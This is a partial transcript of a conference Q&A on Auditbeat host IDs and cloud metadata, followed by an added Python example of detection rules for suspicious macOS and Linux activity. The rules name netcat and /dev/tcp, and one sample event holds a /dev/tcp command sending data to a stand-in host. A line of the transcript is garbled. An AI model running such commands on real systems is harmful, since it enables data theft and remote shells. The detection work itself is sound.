It's generated when Auditbeat is installed. There's some algorithm for generating the ID, I can't remember exactly what it was, but so yes, if you uninstall Auditbeat and then reinstall Auditbeat, I believe it gets, I'm not a hundred percent on that, but I'm pretty sure it gets a new host ID. So in a cluster type, you know, in a container type environment, if you just have your container script install Auditbeat as the container is built, each container gets its own new, even though it's a copy of the same exact image with all the exact same hardware settings and everything, every time it gets a new host ID.

Hi, you mentioned cloud discovery [inaudible]. Is it not on by default, or do you need to enable it?

I can't remember if that was in the default config or not. That's the cloud metadata functionality, I believe that's on by default. So yeah, I can't remember that, I've been looking at my config so long, it's been a while since I've actually looked at the default config, but it's a quick one-line thing to turn on and off, and the data in there is pretty nice because it shows you which, you know, which cluster, which cloud account. So, you know, we have a lot of accounts, so we have customers that use our cloud infrastructure, so when I see an alert I've got that and say oh, this is the exact Google GCP account for that alert, and so then I pass that over to our cloud security team and they know exactly, you know, okay, that was this customer, that was this image within their cloud, that was the cluster that they were in, or the damage. So all that information really helps in a cloud environment.

Okay, thank you very much. I think in giving me without boat and
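An added example, not from the talk or from Elastic's own rules: the Mac and Linux hunting heuristics the speaker describes (defaults writes, cron use, /private/etc changes, sudo outside the engineering fleet, an Office app spawning a shell, /dev/tcp and netcat in command lines) written as individual rules, one per condition as the speaker recommends, and run over constructed Auditbeat-style events. The dotted ECS-like field names, the "eng-" host-name prefix for engineering machines, and the kubectl allowlist entry are assumptions.

```python
# Added example, not from the talk: the Mac/Linux hunting heuristics above as
# individual rules over constructed Auditbeat-style events. The dotted ECS-like
# field names and the "eng-" engineering host prefix are assumptions.
SHELLS = ("bash", "zsh", "sh", "Terminal")

# One rule per condition (the talk's "20 rules, not one"), so each alert names
# exactly what fired instead of a generic "suspicious command was run".
RULES = [
    ("mac_defaults_write", lambda e: e.get("process.name") == "defaults"
        and "write" in e.get("process.args", "").split()),
    ("mac_crontab_use", lambda e: e.get("process.name") == "crontab"),
    ("private_etc_modified", lambda e: e.get("event.category") == "file"
        and e.get("file.path", "").startswith("/private/etc/")),
    ("sudo_on_non_engineering_host", lambda e: e.get("process.name") == "sudo"
        and not e.get("host.name", "").startswith("eng-")),
    ("office_app_spawned_shell", lambda e: e.get("process.parent.name") == "Microsoft Word"
        and e.get("process.name") in SHELLS),
    ("dev_tcp_in_args", lambda e: "/dev/tcp/" in e.get("process.args", "")),
    ("netcat_executed", lambda e: e.get("process.name") in ("nc", "ncat", "netcat")),
]

# (rule, parent process) pairs to suppress: the talk notes kubectl is the only
# legitimate cron user on its fleet, so that pairing is tuned out (assumed here).
ALLOWLIST = {("mac_crontab_use", "kubectl")}

def evaluate(events, allowlist=ALLOWLIST):
    """Return (rule_name, host) for every rule that fires and is not allowlisted."""
    hits = []
    for e in events:
        parent = e.get("process.parent.name", "")
        hits += [(name, e.get("host.name", "")) for name, check in RULES
                 if check(e) and (name, parent) not in allowlist]
    return hits

SAMPLE_EVENTS = [  # constructed telemetry, not real data
    {"host.name": "mkt-mac-01", "event.category": "process", "process.name": "defaults",
     "process.parent.name": "zsh", "process.args": "defaults write com.example.app Pref 1"},
    {"host.name": "mkt-mac-01", "event.category": "process", "process.name": "sudo",
     "process.parent.name": "zsh", "process.args": "sudo /tmp/installer.sh"},
    {"host.name": "eng-mac-07", "event.category": "process", "process.name": "sudo",
     "process.parent.name": "zsh", "process.args": "sudo brew services restart foo"},
    {"host.name": "eng-mac-07", "event.category": "process", "process.name": "crontab",
     "process.parent.name": "kubectl", "process.args": "crontab -l"},
    {"host.name": "mkt-mac-02", "event.category": "file", "file.path": "/private/etc/bashrc",
     "process.name": "vim", "process.parent.name": "bash"},
    {"host.name": "mkt-mac-02", "event.category": "process", "process.name": "bash",
     "process.parent.name": "Microsoft Word", "process.args": "bash -c id"},
    {"host.name": "build-lnx-03", "event.category": "process", "process.name": "bash",
     "process.parent.name": "sshd", "process.args": "bash -c 'echo x >/dev/tcp/example.invalid/80'"},
]
```

Calling `evaluate(SAMPLE_EVENTS)` yields five (rule, host) pairs, each naming the exact condition that fired; the engineering-host sudo produces nothing and the kubectl crontab event is suppressed by the allowlist.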